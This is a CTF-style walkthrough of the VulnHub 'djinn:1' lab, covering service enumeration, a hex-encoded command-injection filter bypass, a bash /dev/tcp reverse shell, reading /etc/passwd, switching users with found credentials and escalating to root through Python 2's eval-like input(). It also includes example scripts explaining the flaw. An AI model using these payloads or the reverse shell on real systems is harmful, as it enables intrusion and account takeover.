Hack djinn:1 : walkthrough [VulnHub lab] Penetration Testing Practice Series 7
Lab address: djinn: 1
Lab description:
- Level: Beginner-Intermediate
- flags: user.txt and root.txt
- Description: The machine is VirtualBox as well as VMWare compatible. The DHCP will assign an IP automatically. You'll see the IP right on the login screen. You have to find and read two flags (user and root) which are present in user.txt and root.txt respectively.
- Format: Virtual Machine (Virtualbox - OVA)
- Operating System: Linux
After installing the VM, the login screen looks like this:
A port scan shows three open ports: 21, 1337 and 7331.
The FTP port allows anonymous login.
A quick look at the web port turned up no obvious common vulnerabilities.
First, check whether there is anything of interest on the FTP server.
It yields a few pieces of information: the pair nitu:81299 and the username nitish. Since there is no SSH port, set these aside for now.
Connecting to port 1337 with telnet reveals a math game.
I wrote a small Python program to play it:
#!/usr/bin/python
# -*- coding: UTF-8 -*-
# Solver for the arithmetic game on port 1337.
# telnetlib was removed from the standard library in Python 3.13; run this
# with an older interpreter or swap in a raw socket.
import logging
import telnetlib
import time


class TelnetClient():
    def __init__(self,):
        self.tn = telnetlib.Telnet()

    def login_host(self, host_ip, host_port):
        try:
            self.tn.open(host_ip, port=host_port)
        except Exception:
            logging.warning('%s: network connection failed' % host_ip)
            return False
        loop = 0
        while loop < 1010:
            loop = loop + 1
            time.sleep(0.1)
            command_result = self.tn.read_very_eager().decode('ascii')
            print(command_result)
            # each question is a tuple such as (4, '+', 5); skip ticks where
            # nothing (or only a banner) has arrived, otherwise rindex() raises
            if '(' not in command_result or ')' not in command_result:
                continue
            start = command_result.rindex('(') + 1
            end = command_result.rindex(')')
            q = command_result[start:end]
            print(q)
            arr = q.split(", ")
            a1 = int(arr[0])
            a2 = int(arr[2])
            print(int(arr[0]))
            print(arr[1])
            print(int(arr[2]))
            retval = ""
            if arr[1] == "'+'":
                retval = (str(a1+a2))
            if arr[1] == "'-'":
                retval = (str(a1-a2))
            if arr[1] == "'*'":
                retval = (str(a1*a2))
            if arr[1] == "'/'":
                # send an integer when the division is exact, otherwise the
                # fraction itself.  The original tested isinstance(a1/a2, int),
                # which is never true under Python 3 because / yields a float.
                if a2 != 0 and a1 % a2 == 0:
                    retval = (str(a1 // a2))
                else:
                    retval = (str(a1) + "/" + str(a2))
            print(retval)
            self.tn.write(retval.encode('ascii') + b'\n')


if __name__ == '__main__':
    host_ip = '192.168.92.175'
    port = 1337
    telnet_client = TelnetClient()
    telnet_client.login_host(host_ip, port)
What it eventually computes is left for the reader to try.
Next, look at the web service on port 7331.
Scan for files and directories.
Only two pages exist: wish executes shell commands, and genie shows the result.
I used Burp to work on a filter bypass; hex-encoding the command and decoding it with xxd worked for me, and other bypasses are worth trying.
The following characters are filtered: . * / $ ?
POST /wish HTTP/1.1
Host: 192.168.31.166:7331
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.31.166:7331/wish
Content-Type: application/x-www-form-urlencoded
Content-Length: 58
Connection: close
Upgrade-Insecure-Requests: 1
cmd=echo "0x636174202f6574632f706173737764"|xxd -r -p|bash
xxd executed without problems (the hex above decodes to cat /etc/passwd), so the next step is a reverse shell, wrapped the same way because it contains the filtered / character: bash -i >& /dev/tcp/192.168.31.198/1234 0>&1
Once it runs, the reverse connection shows up in meterpreter.
Because I tested on different machines along the way, the addresses change between screenshots; bear with me.
Take a look at /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sam:x:1000:1000:sam,,,:/home/sam:/bin/bash
ftp:x:111:115:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
nitish:x:1001:1001::/home/nitish:/bin/bash
Two regular users exist: sam and nitish.
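Picking the pivot targets out of a passwd dump is worth scripting, since output that comes back through Burp is often form-encoded (note "Mailing+List+Manager" in the listing). The following is an added example, not code from the walkthrough; the embedded sample is constructed from a handful of lines of the page's listing.

```python
#!/usr/bin/env python3
"""Triage /etc/passwd recovered through a command-injection hole.

Decode leftover form-encoding, then keep only accounts that can actually log
in (a shell that is not nologin/false/sync) and, separately, the human UIDs.
"""
from urllib.parse import unquote_plus

NON_LOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync"}

# Constructed sample: a subset of the page's listing, still form-encoded.
SAMPLE = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
list:x:38:38:Mailing+List+Manager:/var/list:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
sam:x:1000:1000:sam,,,:/home/sam:/bin/bash
ftp:x:111:115:ftp+daemon,,,:/srv/ftp:/usr/sbin/nologin
nitish:x:1001:1001::/home/nitish:/bin/bash
"""


def parse_passwd(text):
    """Return (name, uid, gid, gecos, home, shell) tuples for each well-formed
    line, undoing +/%xx form-encoding left over from the HTTP response."""
    rows = []
    for line in text.splitlines():
        line = unquote_plus(line.strip())
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != 7:
            continue              # truncated or wrapped line in the dump
        name, _pw, uid, gid, gecos, home, shell = parts
        rows.append((name, int(uid), int(gid), gecos, home, shell))
    return rows


def login_accounts(text):
    """Accounts with an interactive shell: the first su/sudo targets."""
    return [r[0] for r in parse_passwd(text) if r[5] not in NON_LOGIN_SHELLS]


def human_accounts(text, min_uid=1000):
    """Accounts in the human UID range (nobody's 65534 excluded)."""
    return [r[0] for r in parse_passwd(text) if r[1] >= min_uid and r[1] != 65534]


if __name__ == "__main__":
    print("login shells:", login_accounts(SAMPLE))
    print("human users :", human_accounts(SAMPLE))
```

On djinn this gives root, sam and nitish as the only accounts with a login shell, which matches the two names the page singles out and tells you where creds found on the box can be tried.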
First, check SUID files for privilege escalation.
A file creds.txt turns up under nitish's home directory:
cat /home/nitish/.dev/creds.txt
nitish:p4ssw0rdStr3r0n9
That gives a username and password; with no SSH port, switch user with su nitish instead.
www-data@djinn:/opt/80$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@djinn:/opt/80$ su nitish
Password: p4ssw0rdStr3r0n9
nitish@djinn:/opt/80$ cd /home
nitish@djinn:/home$ ls
nitish  sam
nitish@djinn:/home$ cd nitish
nitish@djinn:~$ ls -l
total 4
-rw-r----- 1 nitish nitish 33 Nov 12 17:29 user.txt
nitish@djinn:~$ cat user.txt
10aay8289ptgguy1pvfa73alzusyyx3c
nitish@djinn:~$
After switching, user.txt in nitish's home directory yields the first flag.
The special file /usr/bin/genie, noted during the earlier SUID check, can be executed directly; run it as sam through sudo with its -cmd option:
sudo -u sam genie -cmd whoami
That elevates to sam. Run sudo -l to see what sam is allowed to do.
sam@djinn:/home/sam$ sudo -l
Matching Defaults entries for sam on djinn:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User sam may run the following commands on djinn:
    (root) NOPASSWD: /root/lago
sam@djinn:/home/sam$ sudo -u root /root/lago
There is one program sam can run as root without a password: lago.
sudo -u root /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:
It is a small menu program; nothing special stands out at first glance.
Next, look through sam's files.
A .pyc file turns up; pull it down and decompile it:
#!/usr/bin/env python
# encoding: utf-8
from getpass import getuser
from os import system
from random import randint


def naughtyboi():
    print 'Working on it!! '


def guessit():
    num = randint(1, 101)
    print 'Choose a number between 1 to 100: '
    s = input('Enter your number: ')
    if s == num:
        system('/bin/sh')
    else:
        print 'Better Luck next time'


def readfiles():
    user = getuser()
    path = input('Enter the full of the file to read: ')
    print 'User %s is not allowed to read %s' % (user, path)


def options():
    print 'What do you want to do ?'
    print '1 - Be naughty'
    print '2 - Guess the number'
    print '3 - Read some damn files'
    print '4 - Work'
    choice = int(input('Enter your choice: '))
    return choice


def main(op):
    if op == 1:
        naughtyboi()
    elif op == 2:
        guessit()
    elif op == 3:
        readfiles()
    elif op == 4:
        print 'work your ass off!!'
    else:
        print 'Do something better with your life'


if __name__ == '__main__':
    main(options())
Reading the program shows where a shell can be obtained. guessit() reads the guess with input(), which in Python 2 is eval(raw_input()): the typed text is evaluated as an expression inside guessit's own scope, so typing the variable name num makes s == num true whatever the random value, and system('/bin/sh') then runs as root because lago is launched through sudo. (readfiles() calls input() the same way.)
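The mechanism, as an added example rather than the decompiled lago source: Python 3's input() returns a string, so the script models the Python 2 call with an explicit eval() over the caller's locals, and replaces the system('/bin/sh') with a return value so the check can be exercised safely. The hardened variant beside it treats the guess as data. Function names and the num override parameter are this example's own.

```python
#!/usr/bin/env python3
"""Why typing the word  num  wins lago's guessing game.

lago is Python 2, where input() is eval(raw_input()): the typed text is
evaluated as an expression in the frame that called input(), so the local
variable  num  is reachable by name and  s == num  is trivially true.
"""
import random


def py2_input(typed, caller_locals):
    """Model of Python 2 input(): evaluate `typed` as an expression with the
    caller's locals visible.  Builtins are stripped here only to keep the demo
    inert; the real Python 2 input() has them, so  __import__('os').system('sh')
    would work just as well, correct number or not."""
    return eval(typed, {"__builtins__": {}}, caller_locals)


def guessit_vulnerable(typed, num=None):
    """lago's guessit() with the shell spawn replaced by a return value.
    (The original draws randint(1, 101) while telling the player 1..100.)"""
    if num is None:
        num = random.randint(1, 101)
    s = py2_input(typed, locals())      # locals() contains num, so "num" resolves
    return s == num                     # True -> lago would run system('/bin/sh') as root


def guessit_hardened(typed, num=None):
    """Same game with the input treated as data: parse an int, never evaluate it."""
    if num is None:
        num = random.randint(1, 100)
    try:
        s = int(typed.strip())
    except ValueError:
        return False
    return s == num


if __name__ == "__main__":
    print("vulnerable, typed 'num':", guessit_vulnerable("num"))   # always True
    print("hardened,   typed 'num':", guessit_hardened("num"))     # always False
```

The fix is not a stronger random number: any Python 2 program that hands input() to a privileged process is an arbitrary-code-execution primitive, and raw_input() plus explicit parsing is the only safe shape.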
sudo -u root /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice: 2
Choose a number between 1 to 100:
Enter your number: num
# id
uid=0(root) gid=0(root) groups=0(root)
# ls -la /root/
total 64
drwx------ 5 root root 4096 Nov 18 13:06 .
drwxr-xr-x 23 root root 4096 Nov 11 18:50 ..
-rw------- 1 root root 23351 Nov 18 13:06 .bash_history
-rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc
drwx------ 3 root root 4096 Oct 21 19:40 .cache
drwx------ 3 root root 4096 Oct 21 19:40 .gnupg
-rwxr-xr-x 1 root root 1827 Nov 14 20:57 lago
drwxr-xr-x 3 root root 4096 Oct 20 23:50 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rwxr-xr-x 1 root root 457 Nov 12 21:24 proof.sh
# sh /root/proof.sh
'unknown': I need something more specific.
_ _ _ _ _
/ \ _ __ ___ __ _ ___(_)_ __ __ _| | | |
/ _ \ | '_ ` _ \ / _` |_ / | '_ \ / _` | | | |
/ ___ \| | | | | | (_| |/ /| | | | | (_| |_|_|_|
/_/ \_\_| |_| |_|\__,_/___|_|_| |_|\__, (_|_|_)
|___/
djinn pwned...
__________________________________________________________________________
Proof: 33eur2wjdmq80z47nyy4fx54bnlg3ibc
Path: /home/sam
Date: Fri Dec 13 20:32:01 IST 2019
Whoami: root
__________________________________________________________________________
By @0xmzfr
Thanks to my fellow teammates in @m0tl3ycr3w for betatesting! :-)
#
Privilege escalated to root; running sh proof.sh yields the second flag. Done!
Summary
1. A lot of time went into FTP and port 1337, and in the end the information from them turned out to be a red herring.
2. The shell filter bypass taught me quite a bit.